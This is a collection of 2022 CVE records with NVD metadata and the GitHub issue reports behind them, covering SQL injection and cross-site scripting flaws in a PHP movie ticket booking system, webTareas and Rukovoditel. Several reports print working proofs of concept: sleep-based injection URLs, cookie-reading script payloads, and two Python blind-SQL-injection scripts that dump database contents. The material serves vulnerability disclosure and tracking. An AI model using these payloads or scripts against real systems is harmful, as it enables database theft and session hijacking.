# Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4 ## 1.Movie Ticket Booking System-PHP SQL injection vulnerability exists At editBooking In PHP, in lines 30-38 of the code, the parameters requested by the front-end POST include first, last, number, email, and amount, while the variable $id is controllable. In lines 17-19 of the code, it is directly substituted into the database for query. In line 38 of the code, a SQL injection vulnerability is generated at $id * SQL injection delay 5 seconds ![1201delay5s](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1201delay5s.png) * SQL injection delay 10 seconds ![1202delay10s](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1202delay10s.png) POC: ```html http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(10)))--%20ace http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(5)))--%20ace ```
Movie Ticket Booking System-PHP SQL injection vulnerability exists
https://api.github.com/repos/aman05382/movie_ticket_booking_system_php/issues/3/comments
0
2022-12-01T02:08:01Z
2022-12-01T07:25:15Z
https://github.com/aman05382/movie_ticket_booking_system_php/issues/3
1,470,542,890
3
4,450
CVE-2022-4249
2022-12-01T08:15:09.560
A vulnerability, which was classified as problematic, was found in Movie Ticket Booking System. Affected is an unknown function of the component POST Request Handler. The manipulation of the argument ORDER_ID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214626 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214626" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214626" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:movie_ticket_booking_system_project:movie_ticket_booking_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1CC14F-D9F9-4E98-9CD1-69C3BECFF808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/aman05382/movie_ticket_booking_system_php/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aman05382", "movie_ticket_booking_system_php" ]
# Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4 ## 1.Movie Ticket Booking System-PHP XSS vulnerability inTxnStatus. Php, code line 17: ORDER_ The variable $ORDER whose ID is input by the user and assigned through POST request_ The ID is then directly output in line 44 of the code. Value="<? Php echo $ORDER_ID?>">There is no filtering. That is to say, we can construct a closed javascript statement to pop up the page. However, we can bypass the character limit at the front end, which is very simple ```php $ORDER_ID = $_POST["ORDER_ID"]; ``` ```html <td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value="<?php echo $ORDER_ID ?>"> ``` PAYLOAD: ```html "><script>alert("ace")</script> ``` ![1201postxss](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1201postxss.png) ![xssalertaces](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/xssalertaces.png) Then check the website source code: ```html <td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value=""><script>alert("ace")</script>"> ```
Movie Ticket Booking System-PHP XSS vulnerability
https://api.github.com/repos/aman05382/movie_ticket_booking_system_php/issues/5/comments
0
2022-12-01T02:09:03Z
2022-12-01T07:24:47Z
https://github.com/aman05382/movie_ticket_booking_system_php/issues/5
1,470,543,844
5
4,451
CVE-2022-4250
2022-12-01T08:15:09.660
A vulnerability has been found in Movie Ticket Booking System and classified as problematic. Affected by this vulnerability is an unknown functionality of the file booking.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214627.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214627" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214627" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:movie_ticket_booking_system_project:movie_ticket_booking_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1CC14F-D9F9-4E98-9CD1-69C3BECFF808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/aman05382/movie_ticket_booking_system_php/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aman05382", "movie_ticket_booking_system_php" ]
# Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4 ## 1.Movie Ticket Booking System-PHP XSS vulnerability There is an XSS vulnerability in Booking In PHP, at line 111, we can see that the value is equal to the value of the variable $id, and the $id controllable variable is determined by user input and output directly. At this time, we can construct a closed XSS statement. The payload is "><script>alert (" ace ")</script>, and then we can construct a pop-up window ```html <input type="hidden" name="movie_id" value="<?php echo $id; ?>"> ``` POC: ```html http://vulcinema.test/booking.php?id=5%22%3E%3Cscript%3Ealert(%22ace%22)%3C/script%3E ``` ![1130alert](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1130alert.png)
Movie Ticket Booking System-PHP XSS vulnerability
https://api.github.com/repos/aman05382/movie_ticket_booking_system_php/issues/2/comments
0
2022-12-01T02:07:31Z
2022-12-01T07:25:22Z
https://github.com/aman05382/movie_ticket_booking_system_php/issues/2
1,470,542,393
2
4,452
CVE-2022-4251
2022-12-01T08:15:09.760
A vulnerability was found in Movie Ticket Booking System and classified as problematic. Affected by this issue is some unknown functionality of the file editBooking.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214628.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.4, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214628" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aman05382/movie_ticket_booking_system_php/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214628" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:movie_ticket_booking_system_project:movie_ticket_booking_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1CC14F-D9F9-4E98-9CD1-69C3BECFF808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/aman05382/movie_ticket_booking_system_php/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aman05382", "movie_ticket_booking_system_php" ]
# Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4 Movie Ticket Booking System-PHP-There is a storage XSS vulnerability At editBooking In PHP, from the 63rd line of code to the 70th line of code, the content entered by the user is directly stored in the database without filtering, and then displayed and processed in view.php, and then viewed In PHP, from line 91 to line 101, the content input by the front end is directly output without any tag closing ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1201update.png) ![1201qdsc](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1201qdsc.png) POC: ```html ace<script>alert(document.cookie)</script> ``` ![1201cookie](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1201cookie.png)
Movie Ticket Booking System-PHP-There is a storage XSS vulnerability
https://api.github.com/repos/aman05382/movie_ticket_booking_system_php/issues/4/comments
0
2022-12-01T02:08:30Z
2022-12-01T07:25:07Z
https://github.com/aman05382/movie_ticket_booking_system_php/issues/4
1,470,543,332
4
4,453
CVE-2022-44290
2022-12-02T20:15:13.880
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/anhdq201/webtareas/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description The id parameter appears to be vulnerable to SQL injection attacks. # Proof of Concept **Step 1:** Go to "/approvals/deleteapprovalstages.php?id=1", add payload '+and+1=1' to id parameter and see response have return data --- ![image](https://user-images.githubusercontent.com/67278071/197383618-6ef8c0d3-c73c-421d-91c4-bf0b66d264d6.png) --- **Step 2:** Add payload '+and+1=2' to id parameter and see response have no return data --- ![image](https://user-images.githubusercontent.com/67278071/197383601-39b4dd15-ec93-43f5-ab79-07b28810647f.png) --- **Step 3:** Identify SQLi boolean based vulnerability, then write script dump database --- ``` import requests, urllib.parse, string # query = sys.argv[1] #printable = string.printable url = 'http://localhost:13340/approvals/deleteapprovalstages.php?id=' headers = { 'Cookie': 'webTareasSID=o75prl9v5q8pjflftgi321mipj' } def calclength(query): target = query.split('+')[0] lent = 0 for n in range(1, 100): payload = "1+and+length((select+%s))=%d" % (target, n) resp = requests.get(url + payload, headers=headers) if 'test' in resp.text: lent = n break return lent def dump(query): global url, headers lent = calclength(query) print('lent = '+str(lent)) result = '' for i in range(1, lent + 1): for n in range(30, 123): payload = "1+and+ASCII(substring((select+%s),%d,1))=%d" % (query, i, n) resp = requests.get(url + payload, headers=headers) #print(payload) if 'test' in resp.text: c = chr(n) print("Found: %s" % c) result += c break return result print(dump('@@version')) ``` --- **Result:** --- ![image](https://user-images.githubusercontent.com/67278071/197383262-93ba78f4-6da7-46bf-96df-06b0f06f93d0.png) --- # Impact SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
SQL injection Vulnerability on "id" in deleteapprovalstages.php in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/2/comments
1
2022-10-23T09:01:12Z
2022-12-09T04:03:40Z
https://github.com/anhdq201/webtareas/issues/2
1,419,712,654
2
4,454
CVE-2022-44291
2022-12-02T20:15:13.950
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/anhdq201/webtareas/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description The id parameter appears to be vulnerable to SQL injection attacks. # Proof of Concept **Step 1:** Go to "/administration/phasesets.php?mode=delete&id=1", add payload '+and+1=1' to id parameter and see response with status 200 OK --- ![image](https://user-images.githubusercontent.com/67278071/197379391-6ade6021-0bd8-4dc8-9aef-80eade428190.png) --- **Step 2:** Add payload '+and+1=2' to id parameter and see response with status 302 Found --- ![image](https://user-images.githubusercontent.com/67278071/197379424-a55fd4b0-966e-4951-898d-98c9c1d8f06a.png) --- **Step 3:** Identify SQLi boolean based vulnerability, then write script dump database --- ``` import requests, urllib.parse, string # query = sys.argv[1] #printable = string.printable url = 'http://localhost:13340/administration/phasesets.php?mode=delete&id=' headers = { 'Cookie': 'webTareasSID=o75prl9v5q8pjflftgi321mipj' } def calclength(query): target = query.split('+')[0] lent = 0 for n in range(1, 100): payload = "1+and+length((select+%s))=%d" % (target, n) resp = requests.get(url + payload, headers=headers) if 'test1' in resp.text: lent = n break return lent def dump(query): global url, headers lent = calclength(query) print('lent = '+str(lent)) result = '' for i in range(1, lent + 1): for n in range(30, 123): payload = "1+and+ASCII(substring((select+%s),%d,1))=%d" % (query, i, n) resp = requests.get(url + payload, headers=headers) #print(payload) if 'test1' in resp.text: c = chr(n) print("Found: %s" % c) result += c break return result print(dump('@@version')) ``` --- **Result:** --- ![image](https://user-images.githubusercontent.com/67278071/197379666-1f685465-f256-4b76-a76d-d500efd6cb0b.png) --- # Impact SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
SQL injection Vulnerability on "id" in phasesets.php in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/1/comments
1
2022-10-23T07:27:46Z
2022-12-09T04:06:11Z
https://github.com/anhdq201/webtareas/issues/1
1,419,684,964
1
4,455
CVE-2022-44944
2022-12-02T20:15:14.027
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/14
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Add announcement" function in the "Help System" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=help_pages/pages&entities_id=24", click "Add announcement" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Title" field. --- ![image](https://user-images.githubusercontent.com/67278071/199528215-eb3d6480-8c28-412d-97bb-99c3210e3160.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199528303-5f63660a-5e32-45fd-b5e5-856bf715a6bc.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Help system" in "Add announcement" function in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/14/comments
1
2022-11-02T15:18:02Z
2022-12-09T03:50:13Z
https://github.com/anhdq201/rukovoditel/issues/14
1,433,334,314
14
4,456
CVE-2022-44945
2022-12-02T20:15:14.103
Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the heading_field_id parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/anhdq201/rukovoditel/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description The heading_field_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the heading_field_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. # Proof of Concept **Step 1:** Add single quote was submitted in the heading_field_id parameter, and a database error message was returned. --- ![image](https://user-images.githubusercontent.com/67278071/199532030-9c108ebf-339a-4164-8144-6b58a54dbfb2.png) --- **Step 2:** Then add two quotes and submit the request, the error message disappears. --- ![image](https://user-images.githubusercontent.com/67278071/199532121-881cfb1c-657b-4127-bd81-144a4887c79f.png) --- **Step 3:** Use SQLMap to dump full database. --- ![image](https://user-images.githubusercontent.com/67278071/199534798-8b1b34db-88ae-4a97-9b54-9e4479eed5de.png) --- # Impact SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
SQL injection Vulnerability on "heading_field_id" in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/16/comments
2
2022-11-02T15:43:14Z
2022-12-09T03:53:49Z
https://github.com/anhdq201/rukovoditel/issues/16
1,433,375,562
16
4,457
CVE-2022-44946
2022-12-02T20:15:14.180
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Add page" function in the "Help System" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=help_pages/pages&entities_id=24", click "Add page" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Title" field. --- ![image](https://user-images.githubusercontent.com/67278071/199529044-ad6421c0-5286-420b-8f3d-da7b2a61e944.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199528963-7f959206-22e1-407c-8755-f9da73f58987.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Help system" in "Add page" function in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/15/comments
1
2022-11-02T15:20:58Z
2022-12-09T03:56:50Z
https://github.com/anhdq201/rukovoditel/issues/15
1,433,340,558
15
4,458
CVE-2022-44947
2022-12-02T20:15:14.257
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".
